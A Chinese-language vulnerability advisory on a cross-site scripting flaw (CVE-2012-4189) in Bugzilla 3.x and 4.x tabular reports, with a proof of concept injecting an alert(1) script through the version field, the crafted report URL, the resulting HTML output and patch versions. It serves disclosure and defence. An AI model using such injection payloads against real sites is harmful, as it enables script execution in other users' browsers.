发布日期:2012-11-14
更新日期:2012-11-15
受影响系统:
Mozilla Bugzilla 4.x
Mozilla Bugzilla 3.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 56504
CVE ID: CVE-2012-4189
Bugzilla是一个开源的缺陷跟踪系统,它可以管理软件开发中缺陷的提交,修复,关闭等整个生命周期。
Bugzilla没有正确过滤tabular报表内的字段值,攻击者可利用此漏洞注入代码,导致跨站脚本执行。
<*来源:Mateusz Goik
链接:https://bugzilla.mozilla.org/show_bug.cgi?id=790296
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
PoC:
?action=add&product=TestProduct ->
Version: "><script>alert(1);</script>
Add new bug to "TestProduct" with version "><script>alert(1);</script>
?format=report-table ->
Horizontal Axis: Version
should be the results: Version: "><script>alert(1);</script>
-> Generate Report
?x_axis_field=version&y_axis_field=&z_axis_field=&query_format=report-table&short_desc_type=allwordssubstr&short_desc=&resolution=---&longdesc_type=allwordssubstr&longdesc=&bug_file_loc_type=allwordssubstr&bug_file_loc=&keywords_type=allwords&keywords=&deadlinefrom=&deadlineto=&bug_id=&bug_id_type=anyexact&version=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&emailassigned_to1=1&emailtype1=substring&email1=&emailassigned_to2=1&emailreporter2=1&emailcc2=1&emailtype2=substring&email2=&emaillongdesc3=1&emailtype3=substring&email3=&chfieldvalue=&chfieldfrom=&chfieldto=Now&j_top=AND&f1=noop&o1=noop&v1=&format=table&action=wrap
Result:
+ oColumn.field + "&version="><script>alert(1);</script>'>"
elLiner.innerHTML = "<a href='buglist.cgi?action=wrap&resolution=---&version="><script>alert(1);</script>'>"
<a href="https://www.linuxidc.com/buglist.cgi?action=wrap&resolution=---&version="><script>alert(1);</script>">5</a>
<a href="https://www.linuxidc.com/buglist.cgi?action=wrap&resolution=---&=%20&version="><script>alert(1);</script>">5</a>
建议:
--------------------------------------------------------------------------------
厂商补丁:
Mozilla
-------
目前厂商已经发布了升级补丁3.6.12, 4.0.9, 4.2.4, 4.4rc1 以修复这个安全问题,请到厂商的主页下载: